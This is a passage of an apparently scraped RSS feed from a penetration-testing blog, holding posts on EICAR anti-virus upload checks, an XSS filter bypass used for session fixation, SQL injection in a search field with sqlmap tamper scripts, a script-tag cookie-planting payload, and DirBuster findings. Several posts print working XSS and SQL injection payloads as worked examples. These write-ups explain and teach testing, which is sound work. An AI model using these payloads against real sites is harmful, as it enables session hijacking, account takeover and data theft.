<p>The best approach is simply to rename the EICAR test file to a file format the application allows you to upload, e.g. change eicar.com to eicar.pdf. One potential niggle is that the file is no longer in a valid format for the file type it&#8217;s purporting to be, e.g. PDFs don&#8217;t start with <code>X5O!P%@AP</code> so if there&#8217;s any file <em>content</em> analysis being done, then the file may be rejected. Depending on the error, this could be taken as evidence that AV is running when in fact it&#8217;s not, so other tests are required to confirm this. If text files are allowed, always use the original EICAR test file as a .txt.</p>
<p>Finally, remember that the aim of this check is not to qualitatively assess the anti-virus; you&#8217;re really only aiming to prove whether or not AV is running. Once you have proof that it is, stop. It&#8217;s really all you can expect to check &#8211; and all that should be expected from you within the bounds of a standard application pentest.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.exploresecurity.com/testing-for-anti-virus-on-file-upload/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>When HTML Encoding Helped XSS</title>
		<link>http://www.exploresecurity.com/when-html-encoding-helped-xss/</link>
		<comments>http://www.exploresecurity.com/when-html-encoding-helped-xss/#comments</comments>
		<pubDate>Fri, 30 Jan 2015 10:19:17 +0000</pubDate>
		<dc:creator>Jerome</dc:creator>
				<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Web Applications]]></category>
		<category><![CDATA[penetration testing]]></category>
		<category><![CDATA[pentesting]]></category>
		<category><![CDATA[session fixation]]></category>
		<category><![CDATA[web apps]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://www.exploresecurity.com/?p=342</guid>
		<description><![CDATA[Recently I was pentesting a web app that had an unauthenticated XSS vulnerability but there was some heavy filtering in place. Nonetheless I was able to achieve session fixation using a combination of a technique I previously explained and some fun filter workarounds &#8211; including using the application&#8217;s own defensive HTML encoding to create a [&#8230;]]]></description>
				<content:encoded><![CDATA[<p>Recently I was pentesting a web app that had an unauthenticated XSS vulnerability but there was some heavy filtering in place. Nonetheless I was able to achieve session fixation using a combination of a technique I <a href="http://www.exploresecurity.com/session-fixation-and-xss-working-hand-in-hand/">previously explained</a> and some fun filter workarounds &#8211; including using the application&#8217;s own defensive HTML encoding to create a working XSS payload!<span id="more-342"></span></p>
<h3>The problem</h3>
<p>The application used a bespoke session management cookie. I&#8217;ll call it MYSESSIONID. On login, it wasn&#8217;t renewed. I couldn&#8217;t push a session cookie onto the victim in a classic session fixation attack. However, I had XSS in an unauthenticated page &#8211; but not the login page. The filtering in place used a combination of removal and encoding. Characters that were stripped out included:</p>
<p><code>+ ; ( ) ? &lt; &gt;</code></p>
<p>Characters that were allowed included:</p>
<p><code>" ' = [ ] / , .</code></p>
<p>So even though MYSESSIONID wasn&#8217;t protected with the <em>HttpOnly</em> flag, I just couldn&#8217;t construct a payload to steal it. Instead I looked to set one of my own. Here&#8217;s a breakdown of the attack:</p>
<h3>1. Get a valid cookie</h3>
<p>The application did not accept arbitrary session management cookies so the attacker sends a request to get a valid one. In this case, simply having no MYSESSIONID wasn&#8217;t enough, the cookie had to be present but an invalid value did the trick:</p>
<p><code>Cookie: MYSESSIONID=aaaaaaaaaaaaaaaaaaa:xx01</code></p>
<p>returned</p>
<p><code>Set-Cookie: MYSESSIONID=NDnQrZ6JsMHyJTBCw8n:xx01; Path=/; Domain=.example.com</code></p>
<h3>2. The XSS</h3>
<p>The malicious link looked something like this (the highlighted bits are explained below):</p>
<p><code>https://www.example.com/app/folder/page?vuln=foo"<span style="color: red;">%0a</span>document.cookie%3d"MYSESSIONID%3dNDnQrZ6JsMHyJTBCw8n:xx01<span style="color: blue;">:%0d</span><span style="color: red;">path%3d/app/</span></code></p>
<p>When clicked, the XSS flaw wrote the following to the return page inside a JavaScript code block:</p>
<p><code>var a = "foo"<br />
document.cookie="MYSESSIONID=NDnQrZ6JsMHyJTBCw8n:xx01:&amp;#13;path=/app/";</code></p>
<p>The <span style="color: red;">%0a</span> at the front of the XSS payload was used to start a new line and this was sufficient to act as a statement terminator after <code>var a = "foo"</code> (semi-colons were being stripped). But in order to inject a <code>path</code> attribute (discussed below) I did need a semi-colon in the cookie string. By running every character through a Burp Intruder attack, I saw which characters were allowed, which were stripped and which were returned encoded. By inserting <span style="color: blue;">:%0d</span> into the XSS payload, :&amp;#13; was returned &#8211; yes, %0d was encoded but %0a (used above) came back fine! Being inside a string inside a JavaScript block, &amp;#13; wasn&#8217;t seen as an HTML entity by the browser and thus wasn&#8217;t interpreted. This provided the semi-colon needed to create a <code>path</code> attribute.</p>
<p>The colon at the front was used because it looked like the session cookie was delimited in that way. That &#8220;xx01&#8221; might refer, for example, to an internal server for load-balancing. Anyway, whatever it did, the application tolerated the unusual suffix to the session cookie. So that explains the :%0d appended to the cookie value in the XSS payload. Now for the <code><span style="color: red;">path%3d/app/</span></code>&#8230;</p>
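<p>To make the encoding trick concrete, here&#8217;s a hypothetical Python re-implementation of the filter &#8211; the real server-side code was never visible, so treat the character lists as assumptions drawn from the Intruder results described above:</p>

```python
import re

def hypothetical_filter(s: str) -> str:
    # Characters the app stripped outright: + ; ( ) ? < >
    s = re.sub(r"[+;()?<>]", "", s)
    # CR was returned HTML-encoded; LF (the statement terminator
    # used above) came back untouched
    return s.replace("\r", "&#13;")

# The cookie-setting part of the payload after URL-decoding (:%0d -> ":\r")
cookie_part = "MYSESSIONID=NDnQrZ6JsMHyJTBCw8n:xx01:\rpath=/app/"
out = hypothetical_filter(cookie_part)
print(out)   # MYSESSIONID=NDnQrZ6JsMHyJTBCw8n:xx01:&#13;path=/app/
```

<p>The only semi-colon in the result is the one supplied by the application&#8217;s own encoder &#8211; sitting exactly where <code>document.cookie</code> needs an attribute delimiter.</p>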
<h3>3. The victim logs in</h3>
<p>So, at this point, the attacker has set the MYSESSIONID cookie on the victim to be <code>NDnQrZ6JsMHyJTBCw8n:xx01:&amp;#13</code> via a reflected XSS attack. Now the victim goes to the login page at https://www.example.com/app/login or is bounced there by navigating to a part of the site that enforces authentication. At login two MYSESSIONID cookies are passed up. This is because one had been set earlier in a <code>Set-Cookie</code> response header the first time the victim hit the site, even if that was by visiting the XSS&#8217;ed page. The genuine MYSESSIONID has a <code>path</code> of / and a <code>domain</code> of .example.com. If I had set a cookie by XSS with no attributes my cookie would have had a <code>path</code> of /app/folder/ (to match the path of the page which set the cookie) and a <code>domain</code> of www.example.com (to match the domain of said page). This would mean my cookie would never be sent up to /app/login for authentication, hence the need to set a <code>path</code> as part of the XSS.</p>
<p>Furthermore, when two MYSESSIONID values were sent up, the application took the first value so I had to make sure my cookie was first. By setting a <code>path</code> of /app/, it trumped the real MYSESSIONID for having a better path match to /app/login. Thus it was listed first in the POST request with the credentials and became authenticated:</p>
<p><code>Cookie: MYSESSIONID=NDnQrZ6JsMHyJTBCw8n:xx01:&amp;#13; MYSESSIONID=4GRc4jiKNeQIfsqh2:xx01</code></p>
<p>In contrast, the <code>domain</code> of a cookie does not govern precedence in a standardised way; it varies between browsers. From memory I think my cookie (with a more specific domain match) was sent up first by IE but second by Chrome and Firefox. It&#8217;s not something you want to rely on. Neither could I overwrite the cookie because for that to happen the name, path and domain must match. That would mean having to change both attributes from their defaults but in this case I could only change one. This is because I&#8217;d need a second semi-colon to set a second attribute and in doing so, using the encoding trick above, the first attribute would be spoilt, e.g. I&#8217;d get</p>
<p><code>var a = "foo"<br />
document.cookie="MYSESSIONID=NDnQrZ6JsMHyJTBCw8n:xx01:&amp;#13;path=/app/<span style="color: red;">&amp;#13</span>;domain=.example.com";</code></p>
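<p>Path precedence, on the other hand, <em>is</em> standardised: RFC 6265 says cookies with longer matching paths are listed first. A small sketch (my own illustration, not the application&#8217;s code) reproduces the Cookie header shown above:</p>

```python
# Sketch of Cookie-header ordering (RFC 6265 section 5.4): cookies whose
# paths are longer (more specific) matches for the request path go first.
# Names and values mirror the example in this post.
def cookie_header(jar, request_path):
    sent = [c for c in jar if request_path.startswith(c["path"])]
    sent.sort(key=lambda c: len(c["path"]), reverse=True)
    return "Cookie: " + "; ".join(c["name"] + "=" + c["value"] for c in sent)

jar = [
    {"name": "MYSESSIONID", "value": "4GRc4jiKNeQIfsqh2:xx01", "path": "/"},
    {"name": "MYSESSIONID", "value": "NDnQrZ6JsMHyJTBCw8n:xx01:&#13", "path": "/app/"},
]
header = cookie_header(jar, "/app/login")
print(header)
```

<p>The /app/ cookie wins the sort and lands first in the header &#8211; which is all the application looked at.</p>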
<p>Developing this proof-of-concept for this specific injection point was quite fiddly and took some persistence but it was worth it. For all of their filtering &#8211; and because they did not change the session cookie after authentication &#8211; this was a nice practical attack using an unauthenticated XSS. One take-away thought then: be sure to probe the XSS defences in full because you never know what might come back and how it could be of help!</p>
]]></content:encoded>
			<wfw:commentRss>http://www.exploresecurity.com/when-html-encoding-helped-xss/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>SQL Injection in Search Fields</title>
		<link>http://www.exploresecurity.com/sql-injection-in-search-fields/</link>
		<comments>http://www.exploresecurity.com/sql-injection-in-search-fields/#comments</comments>
		<pubDate>Thu, 25 Sep 2014 22:07:40 +0000</pubDate>
		<dc:creator>Jerome</dc:creator>
				<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Web Applications]]></category>
		<category><![CDATA[penetration testing]]></category>
		<category><![CDATA[pentesting]]></category>
		<category><![CDATA[SQL]]></category>
		<category><![CDATA[SQL injection]]></category>
		<category><![CDATA[web apps]]></category>

		<guid isPermaLink="false">http://www.exploresecurity.com/?p=234</guid>
		<description><![CDATA[A quick posting about a fun SQL injection I cracked last week (of course, it&#8217;s only when you&#8217;ve cracked them that they&#8217;re fun!). A colleague had found the classic sign of a problem &#8211; add a single quote and you get an error &#8211; but was having no luck doing anything more. I was getting [&#8230;]]]></description>
				<content:encoded><![CDATA[<p>A quick posting about a fun SQL injection I cracked last week (of course, it&#8217;s only when you&#8217;ve cracked them that they&#8217;re fun!). A colleague had found the classic sign of a problem &#8211; add a single quote and you get an error &#8211; but was having no luck doing anything more. I was getting nowhere with my test so I thought I&#8217;d take a look for a change of scene. The input field was in a search box so, for example, <code>search=keyword'</code> returned an error but <code>search=keyword''</code> was fine. Anything more exciting than that, however, such as <code>search=keyword' and '1'='1</code>, didn&#8217;t seem to work as expected: in this case, an error was returned instead of the same set of results that the normal <code>search=keyword</code> produced.<span id="more-234"></span></p>
<p>The first thing I did was to try to terminate the query as simply as possible with no funny business. So in went <code>search=keyword'--</code> but back came an error. It turned out that the injection point was inside a doubly nested query as <code>search=keyword'))--</code> worked, producing the same results as <code>search=keyword</code>. After a bit of faffing about, it occurred to me that spaces might be the issue. So I tried <code>search=keyword'and'1'='1</code> (no spaces in there) and it worked! No error was returned &#8211; but it didn&#8217;t produce the same results as <code>search=keyword</code>: it returned no results at all. What produced the same results as <code>search=keyword</code> was <code>search=keyword'or'1'='1</code>. Okay, park that for now. I had found the main problem &#8211; and it was immediately clear what was going on.</p>
<p>With a developer&#8217;s hat on, what would you do if a user ran a search with multiple keywords? The obvious answer would be to split up the search terms with space as a delimiter, run a query on each one and then return all the results together. If that was true then <code>search=keyword' and '1'='1</code> was running a database query against three terms: <code>keyword'</code>, <code>and</code>, <code>'1'='1</code>. The first of these would fail (just like <code>search=keyword'</code> did), as would the last if it got that far. So next I tried <code>search=keyword'/**/and/**/'1'='1</code> using the inline SQL comment characters and got the same result. Again, using AND returned no results but using OR was like a normal query with <code>search=keyword</code>. I had seen this kind of behaviour once before but I couldn&#8217;t remember what the context was, which is why I&#8217;ve written it down this time!</p>
<h3>AND vs OR</h3>
<p>In general, AND within a SQL statement (and thus in SQL injection too) is restrictive, narrowing the result set, whereas OR is inclusive, widening the result set. But, as with all SQL injection, it all depends on the underlying query. So what could be happening here?</p>
<p>Again, with the developer hat on, what else might you do with a user&#8217;s search terms? Well, it would be nice if you searched a little more widely, using them as stubs. In fact some of the SQL errors were giving this away (thanks, guys): <em>Incorrect syntax near &#8216;%&#8217;</em>. The % character is, of course, a wildcard used with LIKE. So when I searched for <code>keyword</code>, somewhere in the resulting query was <code>LIKE '%keyword%'</code>. This perfectly explains the AND vs OR behaviour&#8230;</p>
<p>When I injected <code>search=keyword'and'1'='1</code> the resulting query included <code>LIKE '%keyword'and'1'='1%'</code>. So the AND clause I&#8217;d added was always evaluating to FALSE and hence no results were returned. Whereas injecting <code>search=keyword'or'1'='1</code> produced <code>LIKE '%keyword'or'1'='1%'</code>. Even though one half of the OR clause was evaluating to FALSE, overall it returned TRUE when I got a positive hit on the keyword.</p>
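<p>The behaviour is easy to reproduce. Here&#8217;s a hypothetical reconstruction in Python with SQLite &#8211; the real query was never visible on this black-box test, so this is only the sort of thing the developer might have written:</p>

```python
import sqlite3

con = sqlite3.connect(":memory:")
con.execute("CREATE TABLE products (name TEXT)")
con.execute("INSERT INTO products VALUES ('red widget')")

def vulnerable_search(term):
    # Hypothetical vulnerable server-side code: the search term is
    # concatenated straight into a LIKE pattern
    sql = "SELECT name FROM products WHERE name LIKE '%" + term + "%'"
    return [row[0] for row in con.execute(sql)]

vulnerable_search("widget")            # ['red widget'] - the normal search
vulnerable_search("widget'or'1'='1")   # ['red widget'] - OR still matches
vulnerable_search("widget'and'1'='1")  # [] - the AND arm is always FALSE
```

<p>The injected quote closes the LIKE pattern early, leaving the trailing <code>%'</code> to form the comparison <code>'1'='1%'</code>, which is always false &#8211; OR tolerates that, AND doesn&#8217;t.</p>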
<p>Since the injection point was inside a doubly nested query and this was a black box test, I had no idea what the real query was, but this certainly made sense. I tried a few more injections to test the theory just for the hell of it:</p>
<ol>
<li>When I terminated the statement, AND and OR did their &#8220;usual&#8221; thing. Which is to say that <code>search=keyword'/**/and/**/1=1))--</code> produced the same result as <code>search=keyword</code> whereas <code>search=keyword'/**/or/**/1=1))--</code> produced lots of results. This is because I was now commenting out the final % along with the rest of the statement.</li>
<li>When I injected <code>search=keyword'and'1%'='1</code> I got the same results as if there had been no injection. This was the real proof. Now the resulting query would have included <code>LIKE '%keyword'and'1%'='1%'</code> so my AND clause evaluated to TRUE when I got a positive hit on the keyword.</li>
<li>Finally, for what it was worth, <code>search=word'and'1%'='1</code> produced the same result, showing that a % preceded the injection point.</li>
</ol>
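<p>These confirmation tests are reproducible too. Below is a hypothetical SQLite reconstruction of the vulnerable query (the real one was never visible, and it&#8217;s a flat query here, so a plain comment stands in for the <code>))--</code> needed against the nested one):</p>

```python
import sqlite3

con = sqlite3.connect(":memory:")
con.execute("CREATE TABLE products (name TEXT)")
con.executemany("INSERT INTO products VALUES (?)",
                [("red widget",), ("blue gadget",)])

def search(term):
    # Same hypothetical concatenation into a LIKE '%...%' pattern
    sql = "SELECT name FROM products WHERE name LIKE '%" + term + "%'"
    return [row[0] for row in con.execute(sql)]

# 1. Terminating the statement: AND narrows, OR widens
search("gadget'/**/and/**/1=1--")   # ['blue gadget'] - like a normal search
search("gadget'/**/or/**/1=1--")    # every row comes back
# 2. Closing the wildcard inside the clause: '1%'='1%' is TRUE, so the
#    AND injection now behaves as if there were no injection at all
search("gadget'and'1%'='1")         # ['blue gadget']
```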
<h3>sqlmap</h3>
<p>One of the things that makes a great tool is the ability to customise it for a particular attack scenario. And sqlmap offers that in abundance. In this case a &#8220;tamper&#8221; script, which transforms the payloads in some way, worked a treat. One of the built-in tamper scripts is &#8220;space2comment&#8221; &#8211; bingo! In fact running sqlmap with this script allowed it to find the injection point. Without the script, though, sqlmap would have been stuck because, to quote the <a href='https://github.com/sqlmapproject/sqlmap/wiki/Usage#tamper-injection-data'>wiki page</a>, &#8220;sqlmap itself does no obfuscation of the payload sent, except for strings between single quotes replaced by their CHAR()-alike representation&#8221;.</p>
<p>All this was a good reminder that, when things are getting tough, thinking like a developer can help to turn near-misses into exploitable flaws. Having said that, I&#8217;ve seen code in the past that I could never have guessed, when it was clear the developer wasn&#8217;t thinking at all!</p>
]]></content:encoded>
			<wfw:commentRss>http://www.exploresecurity.com/sql-injection-in-search-fields/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>Session Fixation and XSS Working Hand-in-Hand</title>
		<link>http://www.exploresecurity.com/session-fixation-and-xss-working-hand-in-hand/</link>
		<comments>http://www.exploresecurity.com/session-fixation-and-xss-working-hand-in-hand/#comments</comments>
		<pubDate>Sat, 06 Sep 2014 22:05:41 +0000</pubDate>
		<dc:creator>Jerome</dc:creator>
				<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Web Applications]]></category>
		<category><![CDATA[Cookies]]></category>
		<category><![CDATA[session fixation]]></category>
		<category><![CDATA[web apps]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://www.exploresecurity.com/?p=212</guid>
		<description><![CDATA[Often a combination of security flaws come together to produce a unique attack vector. Individually the flaws may not amount to much but together they make an interesting combo. This is invariably more interesting from a pentesting point of view because you know that a tool couldn&#8217;t positively find it. Session fixation is one such [&#8230;]]]></description>
				<content:encoded><![CDATA[<p>Often a combination of security flaws come together to produce a unique attack vector. Individually the flaws may not amount to much but together they make an interesting combo. This is invariably more interesting from a pentesting point of view because you know that a tool couldn&#8217;t positively find it. Session fixation is one such scenario because usually a few requirements must be met for the attack to work. I thought I&#8217;d write up a recent session fixation flaw because the act of forcing the cookie onto the victim involved a little twist on overwriting session cookies that made a reflective XSS attack last a lot longer while also laughing in the face of <code>httponly</code>.<span id="more-212"></span></p>
<p>As long as an attacker can remotely force the victim to use a known session cookie that becomes authenticated, you&#8217;ve found session fixation, but it&#8217;s one of those flaws that can be achieved in multiple ways that are subtly different from one another. In this particular instance the session fixation attack ran like this:</p>
<h3>1. The attacker makes up a session cookie</h3>
<p>Yes, the application accepted client-generated cookies.</p>
<h3>2. The attacker makes a specific request using the fabricated cookie</h3>
<p>This was a bit odd but if the session cookie from a request was not recognised by the application (whether it was made up or, more usually, it had just been set by the previous response page) then a background XHR request was made that effectively &#8220;authorised&#8221; the cookie. Okay, whatever, so the attacker does this.</p>
<h3>3. The login page suffered from XSS so the attacker crafts a malicious link to set the known cookie on the victim.</h3>
<p>The malicious link was something like this (I&#8217;ve removed the URL-encoding to make it easier to read):</p>
<p style="padding-left: 30px;"><code>https://www.example.com/login?param="&gt;&lt;script&gt;document.cookie="PHPSESSID=attackerCookie; path=/login; expires=Tue, 06-Aug-2024 00:00:01 GMT"&lt;/script&gt;</code></p>
<p>In more &#8220;traditional&#8221; session fixation the attacker&#8217;s cookie is a parameter in the request that the attacker tricks the victim into making, so using XSS seems a bit like cheating. Unfortunately (for me) the application didn&#8217;t accept a session cookie in the &#8220;traditional&#8221; way and XSS was my only option. OWASP does credit XSS in its description of <a href="https://www.owasp.org/index.php/Session_fixation">session fixation</a> but, that aside, not only did XSS help the session fixation attack but the session fixation flaw helped the XSS attack&#8230;One reason for this was that a simple <code>document.cookie</code> session hijack through XSS was restricted by the response to the above request:</p>
<p style="padding-left: 30px;"><code>Set-Cookie: PHPSESSID=serverCookie; path=/; secure; HttpOnly</code></p>
<p>Because of the <code>httponly</code> flag, the XSS payload could not pull out the session cookie and send it to the attacker. Of course, many other interesting XSS options are still possible, such as rewriting the form&#8217;s <code>action</code> attribute so that the login credentials would be sent to the attacker. However, one advantage of the session fixation approach (apart from the interest of seeing it working) is that <em>nothing</em> is sent to the attacker. Furthermore, as I&#8217;ll explain later (and you may have already spotted from the XSS payload) this attack has the potential to be more long-term than knowing the username and password.</p>
<p>The <code>httponly</code> flag has another effect: the XSS payload can neither read nor overwrite the cookie. This behaviour isn&#8217;t standardised; it&#8217;s one of those grey areas that Michal Zalewski covers <a href="https://code.google.com/p/browsersec/wiki/Part2#Same-origin_policy_for_cookies">so</a> <a href="http://lcamtuf.coredump.cx/tangled/">well</a> but in this case it&#8217;s not so grey. IE 10, Chrome 37 and Firefox 30 all behaved in the same way. But you might have noticed that the XSS payload included a <code>path</code> of /login when it set the session cookie. This is where the attacker wins as now the browser doesn&#8217;t see this as an overwrite but as a different cookie altogether&#8230;</p>
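<p>A toy model of the cookie jar shows why the <code>path</code> trick works: browsers key cookies by name, domain and path, so a different path means a different cookie, not an overwrite. (A simplified sketch of my own &#8211; real jars also track flags and expiry, and <code>httponly</code> blocks the script-based overwrite in the first place.)</p>

```python
# Toy cookie jar keyed the way browsers key cookies: (name, domain, path)
jar = {}

def set_cookie(name, value, domain, path):
    jar[(name, domain, path)] = value

# The server's Set-Cookie on the first response
set_cookie("PHPSESSID", "serverCookie", "www.example.com", "/")
# The XSS payload sets the same name but a different path...
set_cookie("PHPSESSID", "attackerCookie", "www.example.com", "/login")
# ...so nothing is overwritten: two PHPSESSID cookies now coexist
print(len(jar))   # 2
```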
<h3>4. The victim logs in and the session cookie becomes authenticated</h3>
<p>The server-generated session cookie included a <code>path=/</code> directive so when the victim logs in to /login the attacker&#8217;s cookie has precedence (in that it&#8217;s listed first) because the path is a more specific match to the target page:</p>
<p style="padding-left: 30px;"><code>Cookie: PHPSESSID=attackerCookie; PHPSESSID=serverCookie</code></p>
<p>The application processed the first cookie with the login, thus the attacker&#8217;s fabricated cookie became authenticated and was associated with the victim&#8217;s account. Of course if the session cookie had been changed after authentication, which is best practice, the attack would have failed. Note that the attacker can also set the <code>domain</code> attribute of the cookie to .example.com to try to widen the impact of the attack.</p>
<h3>5. The attacker uses the known session cookie to masquerade as the victim</h3>
<p>The last thing to mention is the long-term nature of this attack. Although logging off did detach the session cookie from the victim&#8217;s account, leaving it unauthenticated, the application did not clear it (again, best practice). So the next time the website is visited, the attacker&#8217;s session cookie will again be offered, accepted and authenticated. Because the XSS payload effectively makes the cookie permanent by setting a long expiry date, the attacker has access to the account of anyone that logs in using the compromised browser in the future. Of course, the persistence of the attack dies as soon as the browser&#8217;s cookie cache is cleared &#8211; but how often does that happen? For what is, after all, a <em>reflected</em> XSS attack, you&#8217;d be certain to get a good return. Indeed, if the browser is shared among users (e.g. at home or at internet kiosks), a single XSS attack can exploit multiple users of the website, making it a one-to-many attack, which you don&#8217;t tend to associate with reflected XSS.</p>
<p>I&#8217;m not claiming any of this is particularly novel, by the way. I just enjoyed finding the XSS path trick for myself and using it with session fixation to poke fun at <code>httponly</code> and to create a more persistent version of a reflected XSS attack. It also demonstrated that best practice points, although seemingly trivial when taken alone, can help to stop or mitigate more complex attacks.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.exploresecurity.com/session-fixation-and-xss-working-hand-in-hand/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>SSL/TLS Checklist for Pentesters</title>
		<link>http://www.exploresecurity.com/ssltls-checklist-for-pentesters/</link>
		<comments>http://www.exploresecurity.com/ssltls-checklist-for-pentesters/#comments</comments>
		<pubDate>Mon, 07 Jul 2014 21:58:26 +0000</pubDate>
		<dc:creator>Jerome</dc:creator>
				<category><![CDATA[SSL/TLS]]></category>
		<category><![CDATA[Web Applications]]></category>
		<category><![CDATA[penetration testing]]></category>
		<category><![CDATA[pentesting]]></category>
		<category><![CDATA[SSL]]></category>
		<category><![CDATA[TLS]]></category>

		<guid isPermaLink="false">http://www.exploresecurity.com/?p=201</guid>
		<description><![CDATA[I gave a presentation at BSides MCR 2014 on the subject of SSL and TLS checks from a pentesting viewpoint. The idea was to focus on the pitfalls of testing, why the tools may let you down and how to check for issues manually (as much as possible), often using OpenSSL. The slides can be [&#8230;]]]></description>
				<content:encoded><![CDATA[<p>I gave a presentation at BSides MCR 2014 on the subject of SSL and TLS checks from a pentesting viewpoint. The idea was to focus on the pitfalls of testing, why the tools may let you down and how to check for issues manually (as much as possible), often using OpenSSL.<span id="more-201"></span></p>
<p>The slides can be found <a href="https://www.slideshare.net/exploresecurity/ssltls-checklist-for-pentesters-bsides-mcr-2014">here</a>.</p>
<h3>Cheatsheet</h3>
<p>UPDATE 7th September 2014: I&#8217;ve now written a table that pulls together the manual checks discussed in the presentation &#8211; plus a few more (which will appear in any future presentations). Since tables are a pain in WordPress and I don&#8217;t want to risk a plugin at this time of night, you can find a (lazy) HTML table <a href="http://www.exploresecurity.com/wp-content/uploads/custom/SSL_manual_cheatsheet.html">here</a>.</p>
<p>For updates on content and future presentations <a href="https://twitter.com/exploresecurity">follow me</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.exploresecurity.com/ssltls-checklist-for-pentesters/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>Three Cheers for DirBuster</title>
		<link>http://www.exploresecurity.com/three-cheers-for-dirbuster/</link>
		<comments>http://www.exploresecurity.com/three-cheers-for-dirbuster/#comments</comments>
		<pubDate>Fri, 04 Jul 2014 09:29:23 +0000</pubDate>
		<dc:creator>Jerome</dc:creator>
				<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Web Applications]]></category>
		<category><![CDATA[DirBuster]]></category>
		<category><![CDATA[penetration testing]]></category>
		<category><![CDATA[pentesting]]></category>
		<category><![CDATA[web apps]]></category>

		<guid isPermaLink="false">http://www.exploresecurity.com/?p=183</guid>
		<description><![CDATA[Not exactly wizard stuff today, more like back to basics perhaps &#8211; but sometimes they&#8217;re worth revisiting. I&#8217;ve had some good DirBuster finds three tests in a row so I thought I&#8217;d write them up as a case study. It&#8217;s a reminder that there&#8217;s some very low-hanging fruit out there that may not always get [&#8230;]]]></description>
				<content:encoded><![CDATA[<p>Not exactly wizard stuff today, more like back to basics perhaps &#8211; but sometimes they&#8217;re worth revisiting. I&#8217;ve had some good DirBuster finds three tests in a row so I thought I&#8217;d write them up as a case study. It&#8217;s a reminder that there&#8217;s some very low-hanging fruit out there that may not always get picked. I&#8217;ve also put together a walk-through for many of DirBuster&#8217;s features and I aim to show that, as with many tools, a few minutes of manual work can produce a faster set of more meaningful results.<span id="more-183"></span></p>
<p>If you know what DirBuster is then you can skip this paragraph. If you don&#8217;t, then DirBuster is designed to brute-force directory and file names on web servers, the point being to find content to which there are no links. It&#8217;s an <a href="https://www.owasp.org/index.php/About_OWASP">OWASP</a> project and you can find it <a href="https://www.owasp.org/index.php/Category:OWASP_DirBuster_Project">here</a>. While you can run it in a pure brute-force mode, you&#8217;ll most likely be using a dictionary to maximise your chances of finding something in the time available. DirBuster comes with a set of dictionaries that were generated by crawling the internet for real directory and file names.</p>
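<p>If you&#8217;ve never thought about what such a tool boils down to, the core loop is tiny. Here&#8217;s a minimal sketch &#8211; my own illustration, not DirBuster&#8217;s code &#8211; with the HTTP request stubbed out so the logic is visible:</p>

```python
# Minimal sketch of a dictionary-based forced-browsing loop: try each
# candidate name against the base URL and keep anything that isn't a 404.
# The fetch function is injected so the loop runs without a network.
from urllib.parse import urljoin

def brute_force(base_url, wordlist, fetch):
    found = []
    for word in wordlist:
        url = urljoin(base_url, word + "/")
        status = fetch(url)           # e.g. an HTTP HEAD request
        if status != 404:             # the simplest possible "fail case"
            found.append((url, status))
    return found

# Toy target where only /admin/ and /users/ exist
site = {"https://example.com/admin/": 200, "https://example.com/users/": 200}
hits = brute_force("https://example.com/", ["admin", "backup", "users"],
                   lambda url: site.get(url, 404))
print(hits)
```

<p>In real life the &#8220;fail case&#8221; is rarely a clean 404, which is exactly why DirBuster works one out before it starts &#8211; more on that below.</p>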
<h2>Cheer number 1</h2>
<p>On a test of a web portal DirBuster found pages at <code>/users/</code> and <code>/organisations/</code>. The portal was a closed system used by the owner to exchange financial information with many other organisations in (what was supposed to be) an isolated way. Sorry to be vague but you understand why! Navigating to <code>/users/</code> opened up a whole user management area, with full names, email addresses, roles, last login etc. At <code>/organisations/</code> there was an organisation management area, from where you could access the same user details from other organisations. Oops. While unauthorised data access was possible, attempts to execute administrative functions failed &#8211; but the fact that these functions were exposed was useful in itself because there was no CSRF protection. Moreover it was simple to target an administrator (of any organisation) because you could look them up from the user listings. The only saving grace was that you had to be authenticated &#8211; a point I&#8217;ll return to later.</p>
<h2>Cheer number 2</h2>
<p>On a public website for a high-street company, DirBuster found the page <code>/staff/</code>. This revealed a staff discount page where you could go through and order stuff at significant discounts, meaning lost revenue to the client. Of course, this sort of thing has a habit of getting out on to discount sites and the like. The page was available unauthenticated (although since anyone could register for an account, that&#8217;s by the bye).</p>
<p>Cheer number 2½: DirBuster also found a page that had a special offer for readers of a particular publication. Not as important this one since it was obviously there for the taking but it clearly wasn&#8217;t designed to be available to all.</p>
<h2>Cheer number 3</h2>
<p>On a test of a web portal, while authenticated, DirBuster found a positive response from <code>/admin</code>. This turned out to be an authorisation flaw and a short time later, after some fuzzing of user IDs, I had some 2,300 usernames and email addresses as well as plaintext passwords for about a third of those accounts. This portal was used by many different organisations &#8211; and a user from one of them could log in to another user&#8217;s account from another organisation. Oops.</p>
<p>In fact I had a fourth cheer yesterday, where I found a page that allowed me to self-register unauthenticated on (what was supposed to be) a <em>closed</em> site! But &#8220;four cheers for DirBuster&#8221; sounds a bit naff.</p>
<h2>Walk-through</h2>
<p>The rest (and majority) of this article is a walk-through of the main DirBuster configuration options. <em><span style="text-decoration: underline;">Note</span> that I&#8217;m describing a general case in what follows and obviously there may be times when you need to do things differently. That&#8217;s an important part of pentesting: adapting your test to suit the target</em>. Having said that, let&#8217;s take a look at the starting screen (of version 1.0 RC1, on which this article is based):</p>
<p><a href="http://www.exploresecurity.com/wp-content/uploads/2014/07/DirBuster-main-screen.png"><img class="aligncenter size-full wp-image-188" alt="DirBuster main screen" src="http://www.exploresecurity.com/wp-content/uploads/2014/07/DirBuster-main-screen.png" width="769" height="589" /></a></p>
<h3>Target URL</h3>
